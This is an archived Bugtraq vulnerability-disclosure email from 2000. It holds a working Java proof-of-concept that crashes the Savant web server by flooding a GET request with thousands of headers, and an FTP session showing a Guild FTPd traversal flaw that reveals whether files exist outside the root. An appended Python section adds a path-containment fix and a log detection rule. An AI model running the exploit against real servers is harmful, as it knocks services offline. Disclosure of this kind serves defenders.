5263750 2000-07-10 10:58 /110 lines/ Postmaster
Recipient: Bugtraq (import) <11666>
Subject: gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd
------------------------------------------------------------
Date: Sat, 8 Jul 2000 15:41:29 +0200
From: Andrew Lewis <wizdumb@UNIX.ZA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSF.4.10.10007081536560.12309-100000@unix.za.net>

Yo,

Errr... Sorry about saying gnu-pop3d had the same problem as FTGate - don't know how that got in my list - I assume from posting after a rather hectic party and before that vital cup of coffee the next day. :)

Apologies, all.

Anyway, I found a stack overflow in the Savant webserver the other day - lemmee just paste the code I wrote here...

/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 * Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server receives too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 *
 * Registers:
 *
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 *
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 *
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000] */

import java.io.*;
import java.net.*;

class savantstack {
    public static void main(String[] args) throws IOException {
        if (args.length != 1) {
            System.out.println("Syntax: java savantstack [hostname/ip]");
            System.exit(1);
        }

        Socket soq = null;
        PrintWriter white = null;
        int i = 5000; // Number of header lines to send. This should do fine :-)

        // Plain TCP connection to the web server on port 80
        soq = new Socket(args[0], 80);
        white = new PrintWriter(soq.getOutputStream(), true);

        System.out.print("Showing " + args[0] + " the phj33r :P ...");

        // Request line followed by i copies of the header "A:A", then the
        // blank line that ends the header block
        white.print("GET /index.html HTTP/1.0");
        for (int x = 0; x < i; x++)
            white.println("A:A");
        white.println("\n");

        System.out.println("Done!");

        white.close();
        soq.close();
    }
}

That's it.

I also found a more minor vulnerability in Guild FTPd - although directory traversal with GET can't be used to d/l files outside of the FTP root directory, it can be used to see if files exist. An example follows...

C:\wizdumb>ftp localhost
Connected to kung-phusion.
220-GuildFTPD FTP Server (c) 1999
220-Version 0.93i
220 Please enter your name:
User (kung-phusion:(none)): test
331 User name okay, Need password.
Password:
230 User logged in.
ftp> cd ..
550 Access denied.
ftp> get ../nonexistant.txt
200 PORT command successful.
550 Access denied.
ftp> get ../autoexec.bat
200 PORT command successful.
150 Opening ascii mode data connection for \../autoexec.bat (1143 bytes).
425 Download failed.
ftp> quit
221 Goodbye. Control connection closed.

The SIZE command can also be used in a similar manner.

Anyway, I'm outta here again...

Cheers,
Andrew Lewis aka. Wizdumb [MDMA]
wizdumb@leet.org
www.mdma.za.net/fk
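The Guild FTPd behaviour above is an existence oracle: the server decides "access denied" versus "opening data connection" only after it has looked the file up, so the reply leaks whether a file outside the root exists. Added example (not code from the post or from Guild FTPd): a containment check taken on the normalised path before any filesystem access, so both escaping names get the identical reply, plus the same check reused as a detection rule over a constructed FTP command log. The root path, sample files and log format are assumptions made for this example.

```python
# Added example: path containment before the filesystem is consulted, so the
# reply for "../autoexec.bat" and "../nonexistant.txt" is the same either way.
# FTP_ROOT, the sample files and the log lines are constructed, not real.
import posixpath
import re

FTP_ROOT = "/srv/ftp"  # constructed root; a real server reads it from config

def resolve_in_root(root, requested):
    """Canonical path for `requested` if it stays inside `root`, else None.
    Backslashes are folded to '/' (the server in the post accepted them) and
    the decision is made on the normalised string, before any stat()/open()."""
    rel = requested.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, rel))
    root_norm = posixpath.normpath(root)
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None

def handle_retr(root, requested, exists):
    """Reply for RETR or SIZE. `exists` is the caller's filesystem probe (e.g.
    os.path.isfile) and is consulted only for contained paths, so an escaping
    name can never turn the reply into an existence oracle."""
    path = resolve_in_root(root, requested)
    if path is None:
        return "550 Access denied."
    if not exists(path):
        return "550 File not found."
    return f"150 Opening ascii mode data connection for {requested}."

COMMAND = re.compile(r"^(RETR|SIZE|STOR|CWD)\s+(.+)$", re.IGNORECASE)

# Constructed FTP command log, one command per line, modelled on the session
SAMPLE_LOG = [
    "USER test",
    "RETR ../nonexistant.txt",
    "RETR ../autoexec.bat",
    "SIZE pub/readme.txt",
    "SIZE \\../autoexec.bat",
]

def flag_traversal(log_lines, root=FTP_ROOT):
    """Logged commands whose argument would leave `root`: the check that
    refuses the request doubles as the detection rule."""
    hits = []
    for line in log_lines:
        m = COMMAND.match(line)
        if m and resolve_in_root(root, m.group(2)) is None:
            hits.append(line)
    return hits
```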